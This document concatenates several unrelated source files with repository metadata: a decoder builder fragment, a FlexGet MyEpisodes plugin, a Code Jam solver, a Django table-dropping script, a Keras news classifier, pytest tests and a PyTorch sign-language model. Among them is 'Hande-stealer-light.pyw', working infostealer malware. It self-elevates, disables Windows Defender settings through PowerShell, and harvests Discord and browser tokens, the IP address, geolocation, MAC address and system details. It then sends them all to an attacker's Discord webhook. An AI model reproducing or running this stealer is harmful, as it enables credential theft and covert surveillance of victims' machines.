attn_sigmoid_smoothing=args.attn_sigmoid,
attn_conv_out_channels=args.attn_conv_n_channels,
attn_conv_kernel_size=args.attn_conv_width,
attn_n_heads=args.attn_n_heads,
rnn_type=args.dec_type,
n_units=args.dec_n_units,
n_projs=args.dec_n_projs,
n_layers=args.dec_n_layers,
bottleneck_dim=args.dec_bottleneck_dim,
emb_dim=args.emb_dim,
vocab=vocab,
tie_embedding=args.tie_embedding,
dropout=args.dropout_dec,
dropout_emb=args.dropout_emb,
dropout_att=args.dropout_att,
ss_prob=args.ss_prob,
ss_type=args.ss_type,
lsm_prob=args.lsm_prob,
ctc_weight=ctc_weight,
ctc_lsm_prob=args.ctc_lsm_prob,
ctc_fc_list=ctc_fc_list,
mbr_weight=args.mbr_weight,
mbr_nbest=args.mbr_nbest,
mbr_softmax_smoothing=args.mbr_softmax_smoothing,
            backward=(dir == 'bwd'),  # NOTE: 'dir' is the Python builtin here, so this always evaluates to False
lm_fusion=lm_fusion,
lm_fusion_type=args.lm_fusion_type,
discourse_aware=args.discourse_aware,
lm_init=lm_init,
global_weight=global_weight,
mtl_per_batch=args.mtl_per_batch,
param_init=args.param_init,
mocha_chunk_size=args.mocha_chunk_size,
mocha_adaptive=args.mocha_adaptive,
mocha_1dconv=args.mocha_1dconv,
mocha_quantity_loss_weight=args.mocha_quantity_loss_weight,
mocha_ctc_sync=args.mocha_ctc_sync,
gmm_attn_n_mixtures=args.gmm_attn_n_mixtures,
replace_sos=args.replace_sos,
soft_label_weight=args.soft_label_weight)
return decoder
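# ----------------------------------------------------------------------
# Hedged usage sketch (illustration only): build_decoder expects an args
# namespace carrying every hyperparameter referenced above. The values
# below are assumptions for illustration, not defaults from the repo:
#
#   decoder = build_decoder(
#       args,                              # e.g. the parsed training config
#       special_symbols=special_symbols,   # eos/unk/pad/blank ids
#       enc_n_units=512, vocab=10000,
#       ctc_weight=0.3, ctc_fc_list=[],
#       global_weight=1.0)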
| [
"[email protected]"
] | |
f922cf4ebb4055119a9e0e2468630b05bc1bef64 | 4c156a21245ad414e9495a5f59cf4d4427759255 | /Hande-stealer-light.pyw | bc3b565fbf2f6a752a14e35e78d669b8ef71b666 | [
"MIT"
] | permissive | simplifies/Hande-Stealer | f464bd56695726058d2a6084f6ba6cd7afd33ba6 | da5244c774e9bf66c5c1870b6cab3d194b4890ff | refs/heads/main | 2023-04-06T07:07:38.471222 | 2021-04-13T10:52:42 | 2021-04-13T10:52:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,537 | pyw | import os
import re
import platform
import time
import requests
from io import BytesIO
import json
from dhooks import Webhook, Embed, File
from datetime import datetime
import sys
import win32com.shell.shell as shell
from getmac import get_mac_address as gma
ASADMIN = 'asadmin'
if sys.argv[-1] != ASADMIN:
script = os.path.abspath(sys.argv[0])
params = ' '.join([script] + sys.argv[1:] + [ASADMIN])
shell.ShellExecuteEx(lpVerb='runas', lpFile=sys.executable, lpParameters=params)
sys.exit(0)
os.system("powershell.exe -command Add-MpPreference -ExclusionExtension .exe")
os.system("powershell.exe -command Set-MpPreference -EnableControlledFolderAccess Disabled")
os.system("powershell.exe -command Set-MpPreference -PUAProtection disable")
hook = Webhook("https://Your Webhook Url") #change this
embed = Embed(
description='Hande-Stealer From Swagkarna! :smiley:',
color=0x5CDBF0,
timestamp='now'
)
image1 = 'https://avatars.githubusercontent.com/u/79452028?s=460&u=0602f46611611527d9f4147aa67c47fa4b2fe739&v=4'
embed.set_author(name='Author : swagkarna', icon_url=image1)
embed.add_field(name='Github Profile', value='https://github.com/swagkarna')
embed.add_field(name='Youtube', value='https://www.youtube.com/channel/UCszs81OmjgsLzNsgk3f4yxw')
embed.set_footer(text='Happy Hacking', icon_url=image1)
embed.set_thumbnail(image1)
hook.send(embed=embed)
def find_tokens(path):
path += '\\Local Storage\\leveldb'
tokens = []
for file_name in os.listdir(path):
if not file_name.endswith('.log') and not file_name.endswith('.ldb'):
continue
for line in [x.strip() for x in open(f'{path}\\{file_name}', errors='ignore').readlines() if x.strip()]:
for regex in (r'[\w-]{24}\.[\w-]{6}\.[\w-]{27}', r'mfa\.[\w-]{84}'):
for token in re.findall(regex, line):
tokens.append(token)
return tokens
time.sleep(1)
def main():
local = os.getenv('LOCALAPPDATA')
roaming = os.getenv('APPDATA')
message = ''
paths = {
'Discord': roaming + '\\Discord',
'Discord Canary': roaming + '\\discordcanary',
'Discord PTB': roaming + '\\discordptb',
'Google Chrome': local + '\\Google\\Chrome\\User Data\\Default',
'Opera': roaming + '\\Opera Software\\Opera Stable',
'Brave': local + '\\BraveSoftware\\Brave-Browser\\User Data\\Default',
'Yandex': local + '\\Yandex\\YandexBrowser\\User Data\\Default'
}
for platform, path in paths.items():
if not os.path.exists(path):
continue
tokens = find_tokens(path)
if len(tokens) > 0:
for token in tokens:
message += f'`{token}`\n\n'
else:
message += 'No tokens found.\n'
hook.send(f'{platform}\n{message}')
main()
def stealip():
time = datetime.now().strftime("%H:%M %p")
ip = requests.get('https://api.ipify.org/').text
r = requests.get(f'http://extreme-ip-lookup.com/json/{ip}')
geo = r.json()
embed = Embed()
fields = [
{'name': 'IP', 'value': geo['query']},
{'name': 'ipType', 'value': geo['ipType']},
{'name': 'Country', 'value': geo['country']},
{'name': 'City', 'value': geo['city']},
{'name': 'Continent', 'value': geo['continent']},
{'name': 'Country', 'value': geo['country']},
{'name': 'IPName', 'value': geo['ipName']},
{'name': 'ISP', 'value': geo['isp']},
{'name': 'Latitute', 'value': geo['lat']},
{'name': 'Longitude', 'value': geo['lon']},
{'name': 'Org', 'value': geo['org']},
{'name': 'Region', 'value': geo['region']},
{'name': 'Status', 'value': geo['status']},
]
for field in fields:
if field['value']:
embed.add_field(name=field['name'], value=field['value'], inline=True)
hook.send(embed=embed)
def stealmac():
y = gma()
hook.send("Mac Address : ")
hook.send(y)
stealmac()
def GetSysInfo():
my_system = platform.uname()
hook.send("System Information : ")
hook.send(f"System: {my_system.system}")
hook.send(f"Node Name: {my_system.node}")
hook.send(f"Release: {my_system.release}")
hook.send(f"Version: {my_system.version}")
hook.send(f"Machine: {my_system.machine}")
hook.send(f"Processor: {my_system.processor}")
GetSysInfo()
stealip()
| [
"[email protected]"
] | |
f2ae332d7f80b1cdc90b00f90cafce55f4156e08 | 136c4241843a000020062413ad6ff4d6de8bdf58 | /flexget/plugins/services/myepisodes.py | 95187a0788efde709113b6c8e52b0f8b0411d974 | [
"MIT"
] | permissive | ebadenes/Flexget-Origin | d580b9d0bcd65999d2bba6a7051ed19713c7792d | abc05c8bb99f5241b509c3e403eb399413a60dac | refs/heads/master | 2021-01-16T19:22:39.003993 | 2013-04-29T17:32:32 | 2013-04-29T17:32:32 | 9,701,035 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 7,693 | py | from __future__ import unicode_literals, division, absolute_import
import logging
import urllib
import urllib2
import re
import cookielib
from datetime import datetime
from sqlalchemy import Column, Integer, String, DateTime
from flexget import schema
from flexget.plugin import register_plugin, DependencyError, PluginWarning
try:
from flexget.plugins.api_tvdb import lookup_series
except ImportError:
raise DependencyError(issued_by='myepisodes', missing='api_tvdb',
message='myepisodes requires the `api_tvdb` plugin')
log = logging.getLogger('myepisodes')
Base = schema.versioned_base('myepisodes', 0)
class MyEpisodesInfo(Base):
__tablename__ = 'myepisodes'
id = Column(Integer, primary_key=True)
series_name = Column(String, unique=True)
myepisodes_id = Column(Integer, unique=True)
updated = Column(DateTime)
def __init__(self, series_name, myepisodes_id):
self.series_name = series_name
self.myepisodes_id = myepisodes_id
self.updated = datetime.now()
def __repr__(self):
return '<MyEpisodesInfo(series_name=%s, myepisodes_id=%s)>' % (self.series_name, self.myepisodes_id)
class MyEpisodes(object):
"""
Marks a series episode as acquired in your myepisodes.com account.
Simple Example:
Most shows are recognized automatically from their TVDBname.
And of course the plugin needs to know your MyEpisodes.com account details.
tasks:
tvshows:
myepisodes:
username: <username>
password: <password>
series:
- human target
- chuck
Advanced Example:
In some cases, the TVDB name is either not unique or won't even be discovered.
In that case you need to specify the MyEpisodes id manually using the set plugin.
tasks:
tvshows:
myepisodes:
username: <username>
password: <password>
series:
- human target:
set:
myepisodes_id: 5111
- chuck
How to find the MyEpisodes id: http://matrixagents.org/screencasts/myep_example-20110507-131555.png
"""
def validator(self):
from flexget import validator
root = validator.factory('dict')
root.accept('text', key='username', required=True)
root.accept('text', key='password', required=True)
return root
def on_task_exit(self, task, config):
"""Mark all accepted episodes as acquired on MyEpisodes"""
if not task.accepted:
# Nothing accepted, don't do anything
return
username = config['username']
password = config['password']
cookiejar = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookiejar))
baseurl = urllib2.Request('http://myepisodes.com/login.php?')
loginparams = urllib.urlencode({'username': username,
'password': password,
'action': 'Login'})
try:
logincon = opener.open(baseurl, loginparams)
loginsrc = logincon.read()
except urllib2.URLError as e:
log.error('Error logging in to myepisodes: %s' % e)
return
if str(username) not in loginsrc:
raise PluginWarning(('Login to myepisodes.com failed, please check '
'your account data or see if the site is down.'), log)
for entry in task.accepted:
try:
self.mark_episode(task, entry, opener)
except PluginWarning as w:
log.warning(str(w))
def lookup_myepisodes_id(self, entry, opener, session):
"""Populates myepisodes_id field for an entry, and returns the id.
Call will also set entry field `myepisode_id` if successful.
Return:
myepisode id
Raises:
LookupError if entry does not have field series_name
"""
# Don't need to look it up if we already have it.
if entry.get('myepisodes_id'):
return entry['myepisodes_id']
if not entry.get('series_name'):
raise LookupError('Cannot lookup myepisodes id for entries without series_name')
series_name = entry['series_name']
# First check if we already have a myepisodes id stored for this series
myepisodes_info = session.query(MyEpisodesInfo).\
filter(MyEpisodesInfo.series_name == series_name.lower()).first()
if myepisodes_info:
entry['myepisodes_id'] = myepisodes_info.myepisodes_id
return myepisodes_info.myepisodes_id
# Get the series name from thetvdb to increase match chance on myepisodes
if entry.get('tvdb_series_name'):
query_name = entry['tvdb_series_name']
else:
try:
series = lookup_series(name=series_name, tvdb_id=entry.get('tvdb_id'))
query_name = series.seriesname
except LookupError as e:
log.warning('Unable to lookup series `%s` from tvdb, using raw name.' % series_name)
query_name = series_name
baseurl = urllib2.Request('http://myepisodes.com/search.php?')
params = urllib.urlencode({'tvshow': query_name, 'action': 'Search myepisodes.com'})
try:
con = opener.open(baseurl, params)
txt = con.read()
except urllib2.URLError as e:
log.error('Error searching for myepisodes id: %s' % e)
matchObj = re.search(r'&showid=([0-9]*)">' + query_name + '</a>', txt, re.MULTILINE | re.IGNORECASE)
if matchObj:
myepisodes_id = matchObj.group(1)
db_item = session.query(MyEpisodesInfo).filter(MyEpisodesInfo.myepisodes_id == myepisodes_id).first()
if db_item:
log.info('Changing name to `%s` for series with myepisodes_id %s' %
(series_name.lower(), myepisodes_id))
db_item.series_name = series_name.lower()
else:
session.add(MyEpisodesInfo(series_name.lower(), myepisodes_id))
entry['myepisodes_id'] = myepisodes_id
return myepisodes_id
def mark_episode(self, task, entry, opener):
"""Mark episode as acquired.
Required entry fields:
- series_name
- series_season
- series_episode
Raises:
PluginWarning if operation fails
"""
if 'series_season' not in entry or 'series_episode' not in entry or 'series_name' not in entry:
raise PluginWarning(
'Can\'t mark entry `%s` in myepisodes without series_season, series_episode and series_name fields' %
entry['title'], log)
if not self.lookup_myepisodes_id(entry, opener, session=task.session):
raise PluginWarning('Couldn\'t get myepisodes id for `%s`' % entry['title'], log)
myepisodes_id = entry['myepisodes_id']
season = entry['series_season']
episode = entry['series_episode']
if task.manager.options.test:
log.info('Would mark %s of `%s` as acquired.' % (entry['series_id'], entry['series_name']))
else:
baseurl2 = urllib2.Request(
'http://myepisodes.com/myshows.php?action=Update&showid=%s&season=%s&episode=%s&seen=0' %
(myepisodes_id, season, episode))
opener.open(baseurl2)
log.info('Marked %s of `%s` as acquired.' % (entry['series_id'], entry['series_name']))
register_plugin(MyEpisodes, 'myepisodes', api_ver=2)
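# ----------------------------------------------------------------------
# Hedged illustration (not part of the plugin): lookup_myepisodes_id pulls
# the show id out of the search page with a regex. The canned markup below
# is an assumption modelled on that expression, shown in isolation.
if __name__ == '__main__':
    demo_html = '<a href="views.php?type=eps&showid=5111">Human Target</a>'
    m = re.search(r'&showid=([0-9]*)">' + 'Human Target' + '</a>', demo_html,
                  re.MULTILINE | re.IGNORECASE)
    print(m.group(1))  # -> 5111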
| [
"[email protected]"
] | |
2960c363204b3c970270b04ba3da510e16c8b043 | 487ce91881032c1de16e35ed8bc187d6034205f7 | /codes/CodeJamCrawler/16_0_3/joshg111/c.py | 3247ad1bc43608716c4eafcf837e3f50658944a0 | [] | no_license | DaHuO/Supergraph | 9cd26d8c5a081803015d93cf5f2674009e92ef7e | c88059dc66297af577ad2b8afa4e0ac0ad622915 | refs/heads/master | 2021-06-14T16:07:52.405091 | 2016-08-21T13:39:13 | 2016-08-21T13:39:13 | 49,829,508 | 2 | 0 | null | 2021-03-19T21:55:46 | 2016-01-17T18:23:00 | Python | UTF-8 | Python | false | false | 1,836 | py | import fileinput
from math import sqrt; from itertools import count, islice
def get_divisor(x):
# Stopping checking for divisors when we hit some pre defined maximum.
#for i in islice(count(2), 1000000):
for i in xrange(2, 1000):
if (x % i) == 0:
# This is the case it is not a prime. Return the divisor.
return i
# This is a prime. Unable to get divisor.
return None
def init(n):
x = 1
for i in xrange(n-1):
x *= 10
return x+1
def gen_num(n):
len_perm = (n - 2)
perms = 2 ** len_perm
formatter = '{:0' + str(len_perm) + 'b}'
for i in xrange(perms):
s = formatter.format(i)
s = '1' + s + '1'
yield s
def output_jam(s, divisors):
f.write(s + " ")
for d in divisors:
f.write(str(d) + " ")
f.write("\n")
def gen_jamcoin(n, j):
jams = 0
g_i = gen_num(n)
while jams < j:
s = g_i.next()
divisors = []
found_jam = True
for b in xrange(2, 11):
# Check all the bases
divisor = get_divisor(long(s, b))
if not divisor:
found_jam = False
break
else:
divisors.append(divisor)
if found_jam:
output_jam(s, divisors)
jams += 1
print "jams = " + str(jams)
f = open('workfile_large', 'w')
if __name__ == "__main__":
i = 1
f_i = fileinput.input()
tests = f_i.next()
for line in f_i:
n, j = map(int, line.split(' '))
f.write("Case #" + str(i) + ":\n")
gen_jamcoin(n, j)
i += 1
f.close()
f_i.close() | [
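# ----------------------------------------------------------------------
# Hedged aside (illustration only): a jamcoin must be composite when read
# in every base from 2 to 10. This helper re-checks one coin with the same
# bounded trial division used in get_divisor above.
def is_jamcoin(s, max_base=10):
    for base in xrange(2, max_base + 1):
        if get_divisor(long(s, base)) is None:
            return False
    return True
# e.g. is_jamcoin('100011') is True: 35, 247, 1029, ... all share a small divisor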
"[[email protected]]"
] | |
f3627f85293749abf4bdc02e42166c7f1307955f | 779c7d032eb8d5a4421b8b236c9004559b70756d | /import/drop_cache_tables.py | b74d0ed6091fcc4373b1d48df17bf6f274748eb8 | [] | no_license | corincerami/opus | 727e91a461a6488f2bc263ca6c98a27a93424228 | 281f246ff5bd703a009ab3bad6271249e0e00bff | refs/heads/master | 2022-11-11T13:46:06.317320 | 2018-01-11T00:33:54 | 2018-01-11T00:33:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,262 | py | """
drops all tables like 'cache%' in database 'opus'
"""
# Set up the Django Enviroment for running as shell script
import sys
import os
import django
from django.conf import settings
# sys.path.append('/Users/lballard/projects/opus/')
sys.path.append('/home/django/djcode/') #srvr
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "opus.settings")
# from opus import settings
# settings.configure(CACHES=settings.CACHES, DATABASES=settings.DATABASES) # include any other settings you might need
django.setup()
# script imports
from os import system
from django.db import transaction, connection, reset_queries
from django.core.management import call_command
from django.db.utils import DatabaseError
from settings import MULT_FIELDS # DATABASES creds only
from secrets import DB_ADMIN, DB_ADMIN_PASS
cursor = connection.cursor()
# forget about it
# from settings_local import opus1, opus_to_deploy # names of the databases
database = 'opus'
# drop cache tables
cursor.execute("show tables in {} like 'cache%'".format(database))
all_cache_tables = [row[0] for row in cursor.fetchall() if row[0]]
for cache_table in all_cache_tables:
q_up = "drop table {}.{}".format(database, cache_table)
cursor.execute(q_up)
print q_up
print "Done!"
| [
"[email protected]"
] | |
7da477883e2730f6f5c070b0800fb4dc3f8c6687 | c3a76533d1fbb53f291f49fb95b5e89ed69a75f5 | /amazon_mianjing/isomorphicString.py | 19372b8e2e48d6bd81616dac258d4ef20febecc3 | [] | no_license | jing1988a/python_fb | 5feb68efd32bd63952b4df0c0cd2e766b83451ea | fd310ec0a989e003242f1840230aaac150f006f0 | refs/heads/master | 2020-03-28T21:03:19.375549 | 2019-01-31T17:02:17 | 2019-01-31T17:02:17 | 149,125,354 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 951 | py | # 给你一个list word 你把所有isomorphic group的word分到一起
# isomorphic string的意思是string a 到string b 里面有每一个char都是one to one relationship
# 比如 aba 和cmc是isomorphic 但是aba 和ccc 就不是
# eg: {abba, cppc, abc, emf, bbbb, m} => {{abba, cppc}, {abc, emf}, {bbbb}, {m}}
import collections
class Problem:
def solve(self , words):
        # assume no duplicates in words? not case sensitive??
d=collections.defaultdict(list)
for w in set(words):
d[self.getPattern(w)].append(w)
return d.values()
def getPattern(self , w):
words=list('qwertyuiopasdfghjklzxcvbnm')
ctoP=dict()
pattern=[]
for c in w:
if c not in ctoP:
p=words.pop()
ctoP[c]=p
pattern.append(ctoP[c])
return ''.join(pattern)
test=Problem()
print(test.solve(['abba', 'cppc', 'abc', 'emf', 'bbbb', 'm']))
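# ----------------------------------------------------------------------
# Hedged aside (illustration only): an equivalent canonical key that avoids
# the fixed 26-letter alphabet in getPattern maps each character to the
# index of its first occurrence, so arbitrarily large alphabets work too.
def pattern_by_first_occurrence(w):
    first_seen = {}
    return tuple(first_seen.setdefault(c, len(first_seen)) for c in w)
# pattern_by_first_occurrence('abba') == pattern_by_first_occurrence('cppc') == (0, 1, 1, 0)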
| [
"[email protected]"
] | |
7d85cf8e793d99257d0ce79b6ec1c76a761f0006 | a37b756e34fc39c1237fc68997dbef77df9fa6fc | /dacon/1_articles/dacon_classify_articles_1.py | e5e5f197a6da6982360718465da885fd45e7c8be | [] | no_license | jvd2n/ai-study | e20e38493ad295940a3201fc0cc8061ca9052607 | a82f7c6d89db532f881c76b553b5ab3eea0bdd59 | refs/heads/main | 2023-08-06T03:24:39.182686 | 2021-10-06T14:41:01 | 2021-10-06T14:41:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,836 | py | import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
from icecream import ic
# Data
PATH = './dacon/news/'
train = pd.read_csv(PATH + 'train_data.csv')
test = pd.read_csv(PATH + 'test_data.csv')
submission = pd.read_csv(PATH + 'sample_submission.csv')
ic(train, test, submission)
ic(train.shape, test.shape) # (45654, 3) (9131, 2)
train['doc_len'] = train.title.apply(lambda words: len(words.split()))
ic(train['doc_len'].max())
x_train = np.array([x for x in train['title']])
x_test = np.array([x for x in test['title']])
y_train = np.array([x for x in train['topic_idx']])
ic(x_train, x_test, y_train)
ic(x_train.shape, x_test.shape, y_train.shape) # (45654,) (9131,) (45654,)
print("Article's Max Length: ", max(len(i) for i in x_train)) # 44
print("Article's Avg Length: ", sum(map(len, x_train)) / len(x_train)) # 27.33
# plt.hist([len(s) for s in x_train], bins=50)
# plt.show()
# Preprocessing
from tensorflow.keras.preprocessing.text import Tokenizer
# token = Tokenizer(num_words=2000)
token = Tokenizer(num_words=2000)
token.fit_on_texts(x_train)
seq_train = token.texts_to_sequences(x_train)
seq_test = token.texts_to_sequences(x_test)
print(len(seq_train), len(seq_test))
ic(seq_train[:10])
ic(np.unique(seq_train))
from tensorflow.keras.preprocessing.sequence import pad_sequences
from tensorflow.keras.utils import to_categorical
x_train = pad_sequences(seq_train, padding='pre', maxlen=14)
x_test = pad_sequences(seq_test, padding='pre', maxlen=14)
ic(x_train.shape, x_test.shape) # (45654, 14) (9131, 14)
y_train = to_categorical(y_train)
ic(y_train)
ic(y_train.shape) # (45654, 7)
# Modeling
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense, LSTM, Embedding, Bidirectional
from tensorflow.keras.callbacks import EarlyStopping
model = Sequential()
model.add(Embedding(2000, 200, input_length=14))
model.add(Bidirectional(LSTM(units=128, return_sequences=True)))
model.add(Bidirectional(LSTM(units=64, return_sequences=True)))
model.add(Bidirectional(LSTM(units=32)))
model.add(Dense(7, activation='softmax'))
model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['acc'])
model.summary()
es = EarlyStopping(monitor='val_loss', mode='min', verbose=1, patience=5)
model.fit(x_train, y_train, epochs=50, batch_size=32, validation_split=0.2, callbacks=[es])
y_predict = model.predict(x_test)
ic(y_predict)
# Results make to_csv submissions
ic(len(y_predict))
topic = []
for i in range(len(y_predict)):
    topic.append(np.argmax(y_predict[i]))  # np.argmax -> index of the maximum value
submission['topic_idx'] = topic
ic(submission.shape)
import datetime
date_time = datetime.datetime.now().strftime("%y%m%d_%H%M")
submission.to_csv(PATH + 'CLSFY_ATC_SUB_1_' + date_time + '.csv', index=False) | [
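# ----------------------------------------------------------------------
# Hedged aside (illustration only, appended for clarity): what the
# Tokenizer + pad_sequences steps above do to a toy corpus.
toy = Tokenizer(num_words=10)
toy.fit_on_texts(['economy stocks rise', 'stocks fall'])
toy_seqs = toy.texts_to_sequences(['stocks rise'])
ic(toy_seqs)                                          # [[1, 3]]
ic(pad_sequences(toy_seqs, padding='pre', maxlen=4))  # [[0, 0, 1, 3]]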
"[email protected]"
] | |
049a63b08359ef20611b5bbed9f50e22220ea117 | bbc8192636e0f254ffcb0537306a5bf387235aec | /p2/src/test/test_fixtest.py | 3286780d878dbc2564ccf50eff4d1557ca0526ce | [] | no_license | datason/deployml_course | 99c0034affb66277fef53aca1f903ae93ad3fc12 | f2817115063bae714b02b16bf2ed64f38f0b99ea | refs/heads/main | 2023-02-06T10:59:57.500638 | 2020-12-30T09:27:04 | 2020-12-30T09:27:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,133 | py | # up to parent
import sys, os
PACKAGE_PARENT = '../..'
SCRIPT_DIR = os.path.dirname(os.path.realpath(os.path.join(os.getcwd(), os.path.expanduser(__file__))))
CURROOT = os.path.normpath(os.path.join(SCRIPT_DIR, PACKAGE_PARENT))
sys.path.append(os.path.normpath(os.path.join(SCRIPT_DIR, PACKAGE_PARENT)))
import numpy as np
import pandas as pd
import joblib
from src.main.preprocessors import *
from config.config import *
import pytest
# fixture - creates a special object for use in tests
@pytest.fixture
def params():
N_ESTIMATORS = 32
MAX_DEPTH = 12
MIN_SAMPLES_LEAF = 3
CRITERION = 'mse'
return({"n_estimators" : N_ESTIMATORS,
"max_depth" : MAX_DEPTH,
"min_samples_leaf" : MIN_SAMPLES_LEAF,
"criterion" : CRITERION,
"random_state" : SEED})
@pytest.fixture
def simulated_data():
    # the expected result can be pinned instead of the input data
    # example: a saved predict result
dp = r'%s' % os.path.abspath(os.path.join(os.path.dirname("src"), os.pardir, os.pardir, 'data')).replace('\\', '/')
return generate_test_df(DATA_PATH, CLEAN_DATA, 5)
def test_fit(simulated_data, params):
rfm = RFModel(**params)
data_train = simulated_data
data_test1 = simulated_data
#data_test2 = simulated_data
rfm.fit(data_train[MODEL_FEATURES], data_train[TARGET_NAME])
# или использовать pandas.testing.assert_frame_equal
assert np.allclose(rfm.predict(data_test1[MODEL_FEATURES]), rfm.predict(data_test1[MODEL_FEATURES]), rtol= 0.1)
#assert np.allclose(rfm.predict(data_test2[MODEL_FEATURES]), data_test2[TARGET_NAME], rtol= 0.1)
def test_checkfail(simulated_data, params):
rfm = RFModel(**params)
data_train = simulated_data
# Did not raise
#with pytest.raises(ValueError):
# rfm.fit(data_train[MODEL_FEATURES], data_train[TARGET_NAME])
with pytest.raises(TypeError):
rfm.fit(data_train[MODEL_FEATURES], ",".join(data_train[TARGET_NAME])) | [
"[email protected]"
] | |
95cfc91c55e0f76e5468b436c73920eda466e577 | ab7d6793c9b00b00eae63533bbeffa45a710f690 | /models/HCN.py | 7fed678e3d62e686d23a10570581cab5a6e55ec1 | [] | no_license | subburajs/SLR-1 | c327090256b267b1877854ee01172fc956946876 | 2fc724303dd530ff46085ae89471f958470e3e14 | refs/heads/master | 2023-03-19T21:56:14.061002 | 2020-06-21T16:09:07 | 2020-06-21T16:09:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,307 | py | import torch
import torch.nn as nn
import torchvision
from torchvision import models
from torch.nn import functional as F
class hcn(nn.Module):
def __init__(self,num_class, in_channel=2,
length=32,
num_joint=10,
dropout=0.2):
super(hcn, self).__init__()
self.num_class = num_class
self.in_channel = in_channel
self.length = length
self.num_joint = num_joint
self.conv1 = nn.Sequential(
nn.Conv2d(in_channel,64,1,1,padding=0),
nn.ReLU()
)
# self.bn1 = nn.BatchNorm2d(64)
self.conv2 = nn.Conv2d(64,32,(3,1),1,padding=(1,0))
# self.bn2 = nn.BatchNorm2d(32)
self.hconv = HierarchyConv()
self.conv4 = nn.Sequential(
nn.Conv2d(32,64,3,1,padding=1),
nn.Dropout2d(p=dropout),
nn.MaxPool2d(2)
)
# self.bn4 = nn.BatchNorm2d(64)
self.convm1 = nn.Sequential(
nn.Conv2d(in_channel,64,1,1,padding=0),
nn.ReLU()
)
# self.bnm1 = nn.BatchNorm2d(64)
self.convm2 = nn.Conv2d(64,32,(3,1),1,padding=(1,0))
# self.bnm2 = nn.BatchNorm2d(32)
self.hconvm = HierarchyConv()
self.convm4 = nn.Sequential(
nn.Conv2d(32,64,3,1,padding=1),
nn.Dropout2d(p=dropout),
nn.MaxPool2d(2)
)
# self.bnm4 = nn.BatchNorm2d(64)
self.conv5 = nn.Sequential(
nn.Conv2d(128,128,3,1,padding=1),
nn.ReLU(),
nn.Dropout2d(p=dropout),
nn.MaxPool2d(2)
)
# self.bn5 = nn.BatchNorm2d(128)
self.conv6 = nn.Sequential(
nn.Conv2d(128,256,3,1,padding=1),
nn.ReLU(),
nn.Dropout2d(p=dropout),
nn.MaxPool2d(2)
)
# self.bn6 = nn.BatchNorm2d(256)
# scale related to total number of maxpool layer
scale = 16
self.fc7 = nn.Sequential(
nn.Linear(256*(length//scale)*(32//scale),256),
nn.ReLU(),
nn.Dropout2d(p=dropout)
)
self.fc8 = nn.Linear(256,self.num_class)
def forward(self,input):
output = self.get_feature(input)
output = self.classify(output)
return output
def get_feature(self,input):
# input: N T J D
input = input.permute(0,3,1,2)
N, D, T, J = input.size()
motion = input[:,:,1::,:]-input[:,:,0:-1,:]
motion = F.upsample(motion,size=(T,J),mode='bilinear').contiguous()
out = self.conv1(input)
# out = self.bn1(out)
out = self.conv2(out)
# out = self.bn2(out)
out = out.permute(0,3,2,1).contiguous()
# out: N J T D
# out = self.conv3(out)
out = self.hconv(out)
out = self.conv4(out)
# out = self.bn4(out)
outm = self.convm1(motion)
# outm = self.bnm1(outm)
outm = self.convm2(outm)
# outm = self.bnm2(outm)
outm = outm.permute(0,3,2,1).contiguous()
# outm: N J T D
# outm = self.convm3(outm)
outm = self.hconvm(outm)
outm = self.convm4(outm)
# outm = self.bnm4(outm)
out = torch.cat((out,outm),dim=1)
out = self.conv5(out)
# out = self.bn5(out)
out = self.conv6(out)
# out = self.bn6(out)
# out: N J T(T/16) D
return out
def classify(self,input):
out = input.view(input.size(0),-1)
out = self.fc7(out)
out = self.fc8(out)
t = out
        assert not ((t != t).any())  # check for NaN in the tensor
        assert not (t.abs().sum() == 0)  # check for an all-zero tensor
# N x C (num_class)
return out
class HierarchyConv(nn.Module):
def __init__(self):
super(HierarchyConv,self).__init__()
self.convla = nn.Conv2d(2,16,3,1,padding=1)
self.convra = nn.Conv2d(2,16,3,1,padding=1)
self.conflh = nn.Conv2d(21,16,3,1,padding=1)
self.confrh = nn.Conv2d(21,16,3,1,padding=1)
self.convf = nn.Conv2d(70,32,3,1,padding=1)
self.convl = nn.Conv2d(32,32,3,1,padding=1)
self.convr = nn.Conv2d(32,32,3,1,padding=1)
self.parts = 3
self.conv = nn.Sequential(
nn.Conv2d(self.parts*32,32,3,1,padding=1),
nn.MaxPool2d(2)
)
# self.bn = nn.BatchNorm2d(32)
def forward(self,input):
left_arm = input[:,[3,4],:,:]
right_arm = input[:,[6,7],:,:]
face = input[:,25:95,:,:]
left_hand = input[:,95:116,:,:]
right_hand = input[:,116:137,:,:]
# left_arm = input[:,[0,1],:,:]
# right_arm = input[:,[2,3],:,:]
# face = input[:,4:74,:,:]
# left_hand = input[:,74:95,:,:]
# right_hand = input[:,95:116,:,:]
l1 = self.convla(left_arm)
r1 = self.convra(right_arm)
l2 = self.conflh(left_hand)
r2 = self.confrh(right_hand)
l = torch.cat([l1,l2],1)
r = torch.cat([r1,r2],1)
l = self.convl(l)
r = self.convr(r)
f = self.convf(face)
out = torch.cat([l,r,f],1)
out = self.conv(out)
# out = self.bn(out)
return out | [
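# ----------------------------------------------------------------------
# Hedged smoke-test sketch (not in the original file): checks that a
# forward pass runs with the shapes the slicing above implies (137 pose
# keypoints with 2-D coordinates over 32 frames). Batch size, class count
# and the random inputs are assumptions for illustration only.
if __name__ == '__main__':
    model = hcn(num_class=10, in_channel=2, length=32, num_joint=137)
    dummy = torch.randn(2, 32, 137, 2)  # N x T x J x D
    out = model(dummy)
    print(out.shape)  # expected: torch.Size([2, 10])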
"[email protected]"
] | |
